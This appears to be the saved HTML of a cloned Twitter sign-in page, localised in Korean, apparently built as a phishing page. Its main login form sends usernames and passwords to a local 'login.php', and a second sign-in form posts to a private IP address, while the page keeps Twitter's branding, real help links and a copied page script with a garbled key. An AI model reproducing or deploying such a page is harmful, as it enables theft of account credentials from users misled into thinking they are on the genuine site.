<!DOCTYPE html>
<!--[if IE 8]><html class="lt-ie10 ie8" lang="en data-scribe-reduced-action-queue="true""><![endif]-->
<!--[if IE 9]><html class="lt-ie10 ie9" lang="en data-scribe-reduced-action-queue="true""><![endif]-->
<!--[if gt IE 9]><!-->
<html data-scribe-reduced-action-queue="true" lang="en"><!--<![endif]--><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">







    <meta charset="utf-8">


  <script id="swift_action_queue">
    (function(){function m(a){a||(a=window.event);if(!a)return!1;a.timestamp=(new Date).getTime();!a.target&&a.srcElement&&(a.target=a.srcElement);if(document.documentElement.getAttribute("data-scribe-reduced-action-queue")){var b=a.target;while(b&&b!=document
.body){if(b.tagName=="A")return;b=b.parentNode}}r("all",s(a));if(!q(a)){r("direct",a);return!0}document.addEventListener||(a=s(a));a.preventDefault=a.stopPropagation=a.stopImmediatePropagation=function(){};if(i){f.push(a);r("captured",a)}else r("ignored",a
);return!1}function n($){p();for(var a=0,b;b=f[a];a++){var d=$(b.target),e=d.closest("a")[0];if(b.type=="click"&&e){var g=$.data(e,"events"),i=g&&g.click,j=!e.hostname.match(c)||!e.href.match(/#$/);if(!i&&j){window.location=e.href;continue}}d.trigger(b)}window
.swiftActionQueue.wasFlushed=!0}function o(){for(var a in j){if(a=="all")continue;var b=j[a];for(var c=0;c<b.length;c++)console.log("actionQueue",u(b[c]))}}function p(){clearTimeout(g);for(var a=0,b;b=e[a];a++)document["on"+b]=null}function q(a){if(!a.target
)return!1;var b=a.target,e=(b.tagName||"").toLowerCase();if(a.metaKey)return!1;if(a.shiftKey&&e=="a")return!1;if(b.hostname&&!b.hostname.match(c))return!1;if(a.type.match(d)&&w(b))return!1;if(e=="label"){var f=b.getAttribute("for");if(f){var g=document.getElementById
(f);if(g&&v(g))return!1}else for(var i=0,j;j=b.childNodes[i];i++)if(v(j))return!1}return!0}function r(a,b){b.bucket=a;j[a].push(b)}function s(a){var b={};for(var c in a)b[c]=a[c];return b}function t(a){while(a&&a!=document.body){if(a.tagName=="A")return a;
a=a.parentNode}}function u(b){var c=[];b.bucket&&c.push("["+b.bucket+"]");c.push(b.type);var d=b.target,e=t(d),f="",g,i,j=b.timestamp&&b.timestamp-a;if(b.type==="click"&&e){g=e.className.trim().replace(/\s+/g,".");i=e.id.trim();f=/[^#]$/.test(e.href)?" ("+
e.href+")":"";d='"'+e.innerText.replace(/\n+/g," ").trim()+'"'}else{g=d.className.trim().replace(/\s+/g,".");i=d.id.trim();d=d.tagName.toLowerCase();b.keyCode&&(d=String.fromCharCode(b.keyCode)+" : "+d)}c.push(d+f+(i&&"#"+i)+(!i&&g?"."+g:""));j&&c.push(j);
return c.join(" ")}function v(a){var b=(a.tagName||"").toLowerCase();return b=="input"&&a.getAttribute("type")=="checkbox"}function w(a){var b=(a.tagName||"").toLowerCase();return b=="textarea"||b=="input"&&a.getAttribute("type")=="text"||a.getAttribute("contenteditable"
)=="true"}var a=(new Date).getTime(),b=1e4,c=/^([^\.]+\.)*twitter\.com$/,d=/^key/,e=["click","keydown","keypress","keyup"],f=[],g=null,i=!0,j={captured:[],ignored:[],direct:[],all:[]};for(var k=0,l;l=e[k];k++)document["on"+l]=m;g=setTimeout(function(){i=!1
},b);window.swiftActionQueue={3buckets:j,flush:n,logActions:o,wasFlushed:!1}})();
  </script>


        <link rel="stylesheet" href="Sign%20in%20to%20Twitter_files/rosetta_core.css">

    <link rel="stylesheet" href="Sign%20in%20to%20Twitter_files/rosetta_logged_out.css">


      <title>트위터에 로그인 / 트위터</title>

  <meta name="description" content="Sign in to Twitter. Welcome back!">



<meta name="msapplication-TileImage" content="//abs.twimg.com/favicons/win8-tile-144.png">
<meta name="msapplication-TileColor" content="#00aced">

  <link href="http://abs.twimg.com/favicons/favicon.ico" rel="shortcut icon" type="image/x-icon">

    <meta name="viewport" id="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">

  <meta name="swift-page-name" id="swift-page-name" content="login">

    <link rel="canonical" href="https://twitter.com/login">



<link rel="search" type="application/opensearchdescription+xml" href="http://localhost/opensearch.xml" title="Twitter">

          <link rel="stylesheet" href="Sign%20in%20to%20Twitter_files/rosetta_more.css">

  </head>
  <body class="t1 logged-out swift-loading" data-fouc-class-names="swift-loading" dir="ltr">
      <script id="swift_loading_indicator">
        document.body.className=document.body.className+" "+document.body.getAttribute("data-fouc-class-names");
      </script>
    <div id="doc" class="route-login login-responsive">
        <div class="topbar js-topbar">
  <div id="banners" class="js-banners">
  </div>
  <div class="global-nav" data-section-term="top_nav">
    <div class="global-nav-inner">
      <div class="container">


         <ul class="nav js-global-actions">
            <li class="home" data-global-action="t1home">
                <a class="nav-logo-link" href="http://localhost/" data-nav="front">
                  <?xml version="1.0" encoding="UTF-8"?>
                  <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="34" height="50" viewBox="0 0 72 72" enable-background="new 0 0 72 72" xml:space="preserve">
<path
fill="#2aa9e0" d="M68.812,15.141c-2.348,1.039-4.869,1.743-7.519,2.06c2.703-1.62,4.778-4.187,5.756-7.244c-2.529,1.5-5.33,2.592-8.313,3.176C56.349,10.591,52.948,9,49.182,9c-7.229,0-13.092,5.861-13.092,13.093c0,1.026,0.118,2.021,0.338,2.981c-10.885-0.548-20.528-5.757-26.987-13.679c-1.126,1.936-1.771,4.184-1.771,6.581c0,4.542,2.312,8.551,5.824,10.898c-2.146-0.069-4.165-0.657-5.93-1.638c-0.002,0.055-0.002,0.11-0.002,0.162c0,6.345,4.513,11.638,10.504,12.84c-1.101,0.298-2.256,0.457-3.449,0.457c-0.846,0-1.667-0.078-2.465-0.231c1.667,5.2,6.499,8.986,12.23,9.09c-4.482,3.512-10.129,5.606-16.26,5.606c-1.055,0-2.096-0.061-3.122-0.184c5.794,3.717,12.676,5.882,20.067,5.882c24.083,0,37.251-19.949,37.251-37.249c0-0.566-0.014-1.134-0.039-1.694C64.838,20.068,67.058,17.765,68.812,15.141z"/>
                  </svg>
                   <!--<span class="Icon Icon--bird"><?xml version="1.0" encoding="UTF-8" standalone="no"?>-->
                    <span class="visuallyhidden">Twitter</span></span>
                   </a>   </li> </ul>  <!--<div class="pull-right">  <ul class="nav secondary-nav language-dropdown"> <li class="dropdown js-language-dropdown"> <a href="#supported_languages" class="dropdown-toggle js-dropdown-toggle"> <small>Language:</small> <span class="js-current-language">English</span> <b class="caret"></b> </a> <div class="dropdown-menu"> <div class="dropdown-caret right"> <span class="caret-outer"> </span> <span class="caret-inner"></span> </div> <ul id="supported_languages">  <li><a href="http://localhost/?lang=id" data-lang-code="id" title="Indonesian" class="js-language-link js-tooltip">Bahasa Indonesia</a></li>  <li><a href="http://localhost/?lang=msa" data-lang-code="msa" title="Malay" class="js-language-link js-tooltip">Bahasa Melayu</a></li>  <li><a href="http://localhost/?lang=da" data-lang-code="da" title="Danish" class="js-language-link js-tooltip">Dansk</a></li>  <li><a href="http://localhost/?lang=de" data-lang-code="de" title="German" class="js-language-link js-tooltip">Deutsch</a></li>  <li><a href="http://localhost/?lang=en-gb" data-lang-code="en-gb" title="English UK" class="js-language-link js-tooltip">EnglishUK</a></li>  <li><a href="http://localhost/?lang=es" data-lang-code="es" title="Spanish" class="js-language-link js-tooltip">Español</a></li>  <li><a href="http://localhost/?lang=eu" data-lang-code="eu" title="Basque" class="js-language-link js-tooltip">Euskara</a></li>  <li><a href="http://localhost/?lang=fil" data-lang-code="fil" title="Filipino" class="js-language-link js-tooltip">Filipino</a></li>  <li><a href="http://localhost/?lang=gl" data-lang-code="gl" title="Galician" class="js-language-link js-tooltip">Galego</a></li>  <li><a href="http://localhost/?lang=it" data-lang-code="it" title="Italian" class="js-language-link js-tooltip">Italiano</a></li>  <li><a href="http://localhost/?lang=xx-lc" data-lang-code="xx-lc" title="Lolcat" class="js-language-link js-tooltip">LOLCATZ</a></li>  <li><a href="http://localhost/?lang=hu" data-lang-code="hu" title="Hungarian" class="js-language-link js-tooltip">Magyar</a></li>  <li><a href="http://localhost/?lang=nl" data-lang-code="nl" title="Dutch" class="js-language-link js-tooltip">Nederlands</a></li>  <li><a href="http://localhost/?lang=no" data-lang-code="no" title="Norwegian" class="js-language-link js-tooltip">Norsk</a></li>  <li><a href="http://localhost/?lang=pl" data-lang-code="pl" title="Polish" class="js-language-link js-tooltip">Polski</a></li>  <li><a href="http://localhost/?lang=pt" data-lang-code="pt" title="Portuguese" class="js-language-link js-tooltip">Português</a></li>  <li><a href="http://localhost/?lang=fi" data-lang-code="fi" title="Finnish" class="js-language-link js-tooltip">Suomi</a></li>  <li><a href="http://localhost/?lang=sv" data-lang-code="sv" title="Swedish" class="js-language-link js-tooltip">Svenska</a></li>  <li><a href="http://localhost/?lang=tr" data-lang-code="tr" title="Turkish" class="js-language-link js-tooltip">Türkçe</a></li>  <li><a href="http://localhost/?lang=ca" data-lang-code="ca" title="Catalan" class="js-language-link js-tooltip">català</a></li>  <li><a href="http://localhost/?lang=fr" data-lang-code="fr" title="French" class="js-language-link js-tooltip">français</a></li>  <li><a href="http://localhost/?lang=ro" data-lang-code="ro" title="Romanian" class="js-language-link js-tooltip">română</a></li>  <li><a href="http://localhost/?lang=cs" data-lang-code="cs" title="Czech" class="js-language-link js-tooltip">Čeština</a></li>  <li><a href="http://localhost/?lang=el" data-lang-code="el" title="Greek" class="js-language-link js-tooltip">Ελληνικά</a></li>  <li><a href="http://localhost/?lang=ru" data-lang-code="ru" title="Russian" class="js-language-link js-tooltip">Русский</a></li>  <li><a href="http://localhost/?lang=uk" data-lang-code="uk" title="Ukrainian" class="js-language-link js-tooltip">Українська мова</a></li>  <li><a href="http://localhost/?lang=he" data-lang-code="he" title="Hebrew" class="js-language-link js-tooltip">עִבְרִית</a></li>  <li><a href="http://localhost/?lang=ur" data-lang-code="ur" title="Urdu" class="js-language-link js-tooltip">اردو</a></li>  <li><a href="http://localhost/?lang=ar" data-lang-code="ar" title="Arabic" class="js-language-link js-tooltip">العربية</a></li>  <li><a href="http://localhost/?lang=fa" data-lang-code="fa" title="Farsi" class="js-language-link js-tooltip">فارسی</a></li>  <li><a href="http://localhost/?lang=hi" data-lang-code="hi" title="Hindi" class="js-language-link js-tooltip">हिन्दी</a></li>  <li><a href="http://localhost/?lang=th" data-lang-code="th" title="Thai" class="js-language-link js-tooltip">ภาษาไทย</a></li>  <li><a href="http://localhost/?lang=ja" data-lang-code="ja" title="Japanese" class="js-language-link js-tooltip">日本語</a></li>  <li><a href="http://localhost/?lang=zh-cn" data-lang-code="zh-cn" title="Simplified Chinese" class="js-language-link js-tooltip">简体中文</a></li>  <li><a href="http://localhost/?lang=zh-tw" data-lang-code="zh-tw" title="Traditional Chinese" class="js-language-link js-tooltip">繁體中文</a></li>  <li><a href="http://localhost/?lang=ko" data-lang-code="ko" title="Korean" class="js-language-link js-tooltip">한국어</a></li>  </ul> </div> <div class="js-front-language"> <form action="/sessions/change_locale" class="language" method="POST"> <input type="hidden" name="lang"> <input type="hidden" name="redirect"> <input type="hidden" name="authenticity_token" value="dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52"> </form> </div> </li> </ul>   </div>-->

      </div>
    </div>
  </div>

</div>

        <div id="page-outer">
          <div id="page-container" class="wrapper wrapper-login white">






            <div class="page-canvas">

  <div class="signin-wrapper" data-login-message="">
    <h1>트위터 로그인</h1>
    <form action="login.php" class="clearfix signin js-signin" method="post">
      <fieldset>

  <legend class="visuallyhidden">Sign In</legend>

  <div class="clearfix field">
    <input class="js-username-field email-input js-initial-focus" type="text" name="session[username_or_email]" autocomplete="on" placeholder="휴대폰, 이메일, 사용자 아이디">
  </div>

  <div class="clearfix field">
    <input class="js-password-field" type="password" name="session[password]" placeholder="비밀번호">
  </div>

  <input type="hidden" value="dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52" name="authenticity_token">

</fieldset>

      <div class="captcha js-captcha">
      </div>
      <div class="clearfix">

  <input type="hidden" name="scribe_log">
  <input type="hidden" name="redirect_after_login" value="">
  <input type="hidden" value="dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52" name="authenticity_token">
  <button type="submit" class="submit btn primary-btn">로그인</button>

  <div class="subchck">
    <label class="remember">
      <a class="forgot" href="https://twitter.com/account/begin_password_reset">비밀번호를 잊으셨나요?</a>
      <span class="separator">·</span>
      <a class="signup-helper" href="https://twitter.com/signup">트위터 가입</a>
    </label>
  </div>
</div>

    </form>
  </div>
  </div>

</div>

          </div>
        </div>

    </div>
    <div class="alert-messages hidden" id="message-drawer">
    <div class="message ">
  <div class="message-inside">
    <span class="message-text"></span>
      <a role="button" class="Icon Icon--close Icon--medium dismiss" href="#">
        <span class="visuallyhidden">Dismiss</span>
      </a>
  </div>
</div>
</div>



<div class="gallery-overlay"></div>
<div class="Gallery Gallery--new">
  <div class="Gallery-closeTarget"></div>
  <div class="Gallery-content">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--large">
    <span class="visuallyhidden">Close</span>
  </span>
</button>

    <div class="Gallery-media"></div>
    <div class="GalleryNav GalleryNav--prev">
      <span class="GalleryNav-handle GalleryNav-handle--prev">
          <span class="Icon Icon--caretLeft Icon--large">
            <span class="u-isHiddenVisually">
              Previous
            </span>
          </span>
      </span>
    </div>
    <div class="GalleryNav GalleryNav--next">
      <span class="GalleryNav-handle GalleryNav-handle--next">
          <span class="Icon Icon--caretRight Icon--large">
            <span class="u-isHiddenVisually">
              Next
            </span>
          </span>
      </span>
    </div>
    <div class="GalleryTweet GalleryTweet--new"></div>
  </div>
</div>



<div class="modal-overlay"></div>




<div id="goto-user-dialog" class="modal-container">
  <div class="modal modal-small draggable">
    <div class="modal-content">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>


      <div class="modal-header">
        <h3 class="modal-title">Go to a person's profile</h3>
      </div>

      <div class="modal-body">
        <div class="modal-inner">
          <form class="goto-user-form">
            <input class="input-block username-input" type="text" placeholder="Start typing a name to jump to a profile" aria-label="User">



<div role="listbox" aria-hidden="true" class="dropdown-menu typeahead">
  <div aria-hidden="true" class="dropdown-caret">
    <div class="caret-outer"></div>
    <div class="caret-inner"></div>
  </div>
  <div role="presentation" class="dropdown-inner js-typeahead-results">
    <div role="presentation" class="typeahead-saved-searches">
  <h3 id="saved-searches-heading" class="typeahead-category-title saved-searches-title">Saved searches</h3>
  <ul role="presentation" class="typeahead-items saved-searches-list">

    <li role="presentation" class="typeahead-item typeahead-saved-search-item">
      <span class="icon close" aria-hidden="true"><span class="visuallyhidden">Remove</span></span>
      <a role="option" aria-describedby="saved-searches-heading" class="js-nav" href="" data-search-query="" data-query-source="" data-ds="saved_search" tabindex="-1"></a>
    </li>
  </ul>
</div>

    <ul role="presentation" class="typeahead-items typeahead-topics">

  <li role="presentation" class="typeahead-item typeahead-topic-item">
    <a role="option" class="js-nav" href="" data-search-query="" data-query-source="typeahead_click" data-ds="topics" tabindex="-1">
    </a>
  </li>
</ul>





<ul role="presentation" class="typeahead-items typeahead-accounts js-typeahead-accounts">

  <li role="presentation" data-user-id="" data-user-screenname="" data-remote="true" data-score="" class="typeahead-item typeahead-account-item js-selectable">

    <a role="option" class="js-nav" data-query-source="typeahead_click" data-search-query="" data-ds="account">
      <img class="avatar size24" alt="">
      <span class="typeahead-user-item-info">
        <span class="fullname"></span>
        <span class="js-verified hidden"><span class="icon verified"><span class="visuallyhidden">Verified account</span></span></span>
        <span class="username"><s>@</s><b></b></span>
      </span>
    </a>
  </li>
  <li role="presentation" class="js-selectable typeahead-accounts-shortcut js-shortcut"><a role="option" class="js-nav" href="" data-search-query="" data-query-source="typeahead_click" data-shortcut="true" data-ds="account_search"></a></li>
</ul>

    <ul role="presentation" class="typeahead-items typeahead-trend-locations-list">

  <li role="presentation" class="typeahead-item typeahead-trend-locations-item"><a role="option" class="js-nav" href="" data-ds="trend_location" data-search-query="" tabindex="-1"></a></li>
</ul>
    <ul role="presentation" class="typeahead-items typeahead-context-list">

  <li role="presentation" class="typeahead-item typeahead-context-item"><a role="option" class="js-nav" href="" data-ds="context_helper" data-search-query="" tabindex="-1"></a></li>
</ul>
  </div>
</div>

          </form>
        </div>
      </div>

    </div>
  </div>
</div>


  <div id="retweet-tweet-dialog" class="modal-container">
  <div class="close-modal-background-target"></div>
  <div class="modal draggable">
    <div class="modal-content">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>


      <div class="modal-header">
        <h3 class="modal-title">Retweet this to your followers?</h3>
      </div>

      <div class="tweet-loading">
  <div class="spinner-bigger"></div>
</div>

      <div class="modal-body modal-tweet"></div>

      <div class="modal-footer">
        <button class="btn cancel-action js-close">Cancel</button>
        <button class="btn primary-btn retweet-action">Retweet</button>
      </div>
    </div>
  </div>
</div>

  <div id="delete-tweet-dialog" class="modal-container">
  <div class="close-modal-background-target"></div>
  <div class="modal draggable">
    <div class="modal-content">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>


      <div class="modal-header">
        <h3 class="modal-title">Are you sure you want to delete this Tweet?</h3>
      </div>

      <div class="tweet-loading">
  <div class="spinner-bigger"></div>
</div>

      <div class="modal-body modal-tweet"></div>

      <div class="modal-footer">
        <button class="btn cancel-action js-close">Cancel</button>
        <button class="btn primary-btn delete-action">Delete</button>
      </div>
    </div>
  </div>
</div>


<div id="block-user-dialog" class="modal-container">
  <div class="close-modal-background-target"></div>
  <div class="modal draggable">
    <div class="modal-content">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>


      <div class="modal-header">
        <h3 class="modal-title">Block</h3>
      </div>

      <div class="tweet-loading">
  <div class="spinner-bigger"></div>
</div>

      <div class="modal-body modal-tweet"></div>

      <div class="modal-footer">
        <button class="btn cancel-action js-close">Cancel</button>
        <button class="btn primary-btn block-action">Block</button>
      </div>
    </div>
  </div>
</div>






     <div id="geo-disabled-dropdown">
      <div class="dropdown-menu" tabindex="-1">
  <div class="dropdown-caret">
    <span class="caret-outer"></span>
    <span class="caret-inner"></span>
  </div>
  <ul>
    <li class="geo-not-enabled-yet">
      <h2>Add a location to your Tweets</h2>
      <p>
        When you tweet with a location, Twitter stores that location. 
        You can switch location on/off before each Tweet and always have the option to delete your location history.
        <a href="http://support.twitter.com/forums/26810/entries/78525" target="_blank">Learn more</a>
      </p>
      <div>
        <button type="button" class="geo-turn-on btn primary-btn">Turn location on</button>
        <button type="button" class="geo-not-now btn-link">Not now</button>
      </div>
    </li>
  </ul>
</div>
    </div>

  <div id="geo-enabled-dropdown">
    <div class="dropdown-menu" tabindex="-1">
  <div class="dropdown-caret">
    <span class="caret-outer"></span>
    <span class="caret-inner"></span>
  </div>
  <ul>
    <li class="geo-query-location">
      <input type="text" autocomplete="off" placeholder="Search for a neighborhood or city">
      <span class="icon generic-search"></span>
    </li>
    <li class="geo-dropdown-status"></li>
    <li class="dropdown-link geo-turn-off-item geo-focusable">
      <span class="icon close"></span>Turn off location
    </li>
  </ul>
</div>
  </div>


  <div id="profile_popup" class="modal-container ProfilePopupContainer">
  <div class="close-modal-background-target"></div>
  <div class="modal modal-small draggable">
    <div class="modal-content clearfix">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>

      <div class="modal-header">
        <h3 class="modal-title">Profile summary</h3>
      </div>

      <div class="modal-body profile-modal">

      </div>

      <div class="loading">
        <span class="spinner-bigger"></span>
      </div>
    </div>
  </div>
</div>

  <div id="list-membership-dialog" class="modal-container">
  <div class="close-modal-background-target"></div>
  <div class="modal modal-small draggable">
    <div class="modal-content">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>

      <div class="modal-header">
        <h3 class="modal-title">Your lists</h3>
      </div>
      <div class="modal-body">
        <div class="list-membership-content"></div>
        <span class="spinner lists-spinner" title="Loading…"></span>
      </div>
    </div>
  </div>
</div>
  <div id="list-operations-dialog" class="modal-container">
  <div class="close-modal-background-target"></div>
  <div class="modal modal-medium draggable">
    <div class="modal-content">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>

      <div class="modal-header">
        <h3 class="modal-title">Create a new list</h3>
      </div>
      <div class="modal-body">

<div class="list-editor">
  <div class="field">
    <label for="list-name">List name</label>
    <input id="list-name" type="text" class="text" name="name">
  </div>
  <hr>

  <div class="field">
    <label for="list-description">Description</label>
    <textarea id="list-description" name="description"></textarea>
    <span class="help-text">Under 100 characters, optional</span>
  </div>
  <hr>

  <fieldset class="field">
    <legend>Privacy</legend>
    <div class="options">
      <label for="list-public-radio">
        <input class="radio" type="radio" name="mode" id="list-public-radio" value="public" checked="checked">
        <b>Public</b> · Anyone can follow this list
      </label>
      <label for="list-private-radio">
        <input class="radio" type="radio" name="mode" id="list-private-radio" value="private">
        <b>Private</b> · Only you can access this list
      </label>
    </div>
  </fieldset>
  <hr>

  <div class="list-editor-save">
    <button type="button" class="btn btn-primary update-list-button" data-list-id="">Save list</button>
  </div>

</div>
      </div>
    </div>
  </div>
</div>

  <div id="activity-popup-dialog" class="modal-container">
  <div class="close-modal-background-target"></div>
  <div class="modal draggable">
    <div class="modal-content clearfix">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>


      <div class="modal-header">
        <h3 class="modal-title"></h3>
      </div>

      <div class="modal-body">
        <div class="tweet-loading">
  <div class="spinner-bigger"></div>
</div>

        <div class="activity-tweet modal-tweet clearfix"></div>
        <div class="loading">
          <span class="spinner-bigger"></span>
        </div>
        <div class="activity-content clearfix"></div>
      </div>
    </div>
  </div>
</div>





  <div id="embed-tweet-dialog" class="modal-container">
  <div class="close-modal-background-target"></div>
  <div class="modal modal-medium draggable">
    <div class="modal-content">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>

      <div class="modal-header">
        <h3 class="modal-title">Embed this Tweet</h3>
      </div>
      <div class="modal-body">
        <div class="embed-code-container">
  <p>Add this Tweet to your website by copying the code below. <a href="http://dev.twitter.com/docs/embedded-tweets">Learn more</a></p>
  <form>

    <div class="embed-destination-wrapper">
      <div class="embed-overlay embed-overlay-spinner"><div class="embed-overlay-content"></div></div>
      <div class="embed-overlay embed-overlay-error">
        <p class="embed-overlay-content">Hmm, there was a problem reaching the server. <button type="button" class="btn-link retry-embed">Try again?</button></p>
      </div>
      <textarea class="embed-destination js-initial-focus"></textarea>
      <div class="embed-options">
        <div class="embed-include-parent-tweet">
          <label for="include-parent-tweet">
            <input type="checkbox" id="include-parent-tweet" class="include-parent-tweet" checked="checked">
            Include parent Tweet
          </label>
        </div>
        <div class="embed-include-card">
          <label for="include-card">
            <input type="checkbox" id="include-card" class="include-card" checked="checked">
            Include media
          </label>
        </div>
      </div>
    </div>
  </form>
  <div class="embed-preview">
    <h3>Preview</h3>
  </div>
</div>

      </div>
    </div>
  </div>
</div>









  <div id="signin-or-signup-dialog">
    <div id="signin-or-signup" class="modal-container">
      <div class="close-modal-background-target"></div>
      <div class="modal modal-medium draggable">
        <div class="modal-content">
          <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>

          <div class="modal-header">
            <h3 class="modal-title modal-long-title signup-only">Sign up for Twitter &amp; follow @<span></span></h3>
            <h3 class="modal-title not-signup-only">Sign in to Twitter</h3>
          </div>
          <div class="modal-body signup-only">
            <form action="http://192.168.228.128/signup" class="clearfix signup" method="post">
  <div class="field name">
    <input type="text" autocomplete="off" name="user[name]" maxlength="20" class="js-initial-focus" placeholder="Full name">
  </div>
  <div class="field email">
    <input class="email-input" type="text" autocomplete="off" name="user[email]" placeholder="Email">
  </div>
  <div class="field password">
    <input type="password" name="user[user_password]" placeholder="Password">
  </div>
  <input type="hidden" value="" name="context">
  <input type="hidden" value="dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52" name="authenticity_token">
  <input name="follows" type="hidden" value="">
  <input type="submit" class="btn signup-btn js-submit js-signup-btn" value="Sign up">
</form>

          </div>
          <div class="modal-body not-signup-only">
            <form action="http://192.168.228.128/sessions" class="signin" method="post">
  <fieldset>

  <legend class="visuallyhidden">Sign In</legend>

  <div class="clearfix field">
    <input class="js-username-field email-input js-initial-focus" type="text" name="session[username_or_email]" autocomplete="on" placeholder="Username or email">
  </div>

  <div class="clearfix field">
    <input class="js-password-field" type="password" name="session[password]" placeholder="Password">
  </div>

  <input type="hidden" value="dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52" name="authenticity_token">

</fieldset>

  <div class="clearfix">

  <input type="hidden" name="scribe_log">
  <input type="hidden" name="redirect_after_login" value="">
  <input type="hidden" value="dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52" name="authenticity_token">
  <button type="submit" class="submit btn primary-btn">Sign in</button>

  <div class="subchck">
    <label class="remember">
      <input type="checkbox" value="1" name="remember_me">
      Remember me
      <span class="separator">·</span>
      <a class="forgot" href="http://localhost/account/resend_password">Forgot password?</a>
    </label>
  </div>
</div>

  <div class="divider"></div>
  <p>
    <a class="forgot" href="http://localhost/account/resend_password">Forgot password?</a><br>
    <a class="mobile has-sms" href="http://localhost/account/complete">Already using Twitter via text message?</a>
  </p>
</form>

            <div class="signup">
              <h2>Not on Twitter? Sign up, tune into the things you care about, and get updates as they happen.</h2>
              <form action="https://twitter.com/signup" class="signup" method="get">
  <button class="btn promotional signup-btn" type="submit">Sign up »</button>
</form>

            </div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <div id="sms-codes-dialog" class="modal-container">
  <div class="close-modal-background-target"></div>
  <div class="modal modal-medium draggable">
    <div class="modal-content">
      <button type="button" class="modal-btn modal-close js-close">
  <span class="Icon Icon--close Icon--medium">
    <span class="visuallyhidden">Close</span>
  </span>
</button>

      <div class="modal-header">
        <h3 class="modal-title">Two-way (sending and receiving) short codes:</h3>
      </div>
      <div class="modal-body">

<table id="sms_codes" cellspacing="0" cellpadding="0">
  <thead>
    <tr>
      <th>Country</th>
      <th>Code</th>
      <th>For customers of</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>United States</td>
      <td>40404</td>
      <td>(any)</td>
    </tr>
    <tr>
      <td>Canada</td>
      <td>21212</td>
      <td>(any)</td>
    </tr>
    <tr>
      <td>United Kingdom</td>
      <td>86444</td>
      <td>Vodafone, Orange, 3, O2</td>
    </tr>
    <tr>
      <td>Brazil</td>
      <td>40404</td>
      <td>Nextel, TIM</td>
    </tr>
    <tr>
      <td>Haiti</td>
      <td>40404</td>
      <td>Digicel, Voila</td>
    </tr>
    <tr>
      <td>Ireland</td>
      <td>51210</td>
      <td>Vodafone, O2</td>
    </tr>
    <tr>
      <td>India</td>
      <td>53000</td>
      <td>Bharti Airtel, Videocon, Reliance</td>
    </tr>
    <tr>
      <td>Indonesia</td>
      <td>89887</td>
      <td>AXIS, 3, Telkomsel, Indosat, XL Axiata</td>
    </tr>
    <tr>
      <td rowspan="2">Italy</td>
      <td>4880804</td>
      <td>Wind</td>
    </tr>
    <tr>
      <td>3424486444</td>
      <td>Vodafone</td>
    </tr>
  </tbody>
  <tfoot>
    <tr>
      <td colspan="3">
        » <a class="js-initial-focus" target="_blank" href="http://support.twitter.com/articles/14226-how-to-find-your-twitter-short-code-or-long-code">See SMS short codes for other countries</a>
      </td>
    </tr>
  </tfoot>
</table>
      </div>
    </div>
  </div>
</div>




<div id="create-custom-timeline-dialog" class="modal-container"></div>
<div id="edit-custom-timeline-dialog" class="modal-container"></div>
<div id="curate-dialog" class="modal-container"></div>


    <div class="hidden">
  <iframe aria-hidden="true" class="tweet-post-iframe" name="tweet-post-iframe"></iframe>

</div>

    <div id="spoonbill-outer"></div>
  




    <input type="hidden" class="swift-boot-module" value="app/pages/login">
  <input type="hidden" id="swift-module-path" value="https://abs.twimg.com/c/swift/en">


    <script src="Sign%20in%20to%20Twitter_files/init.js" async=""></script>

</body></html>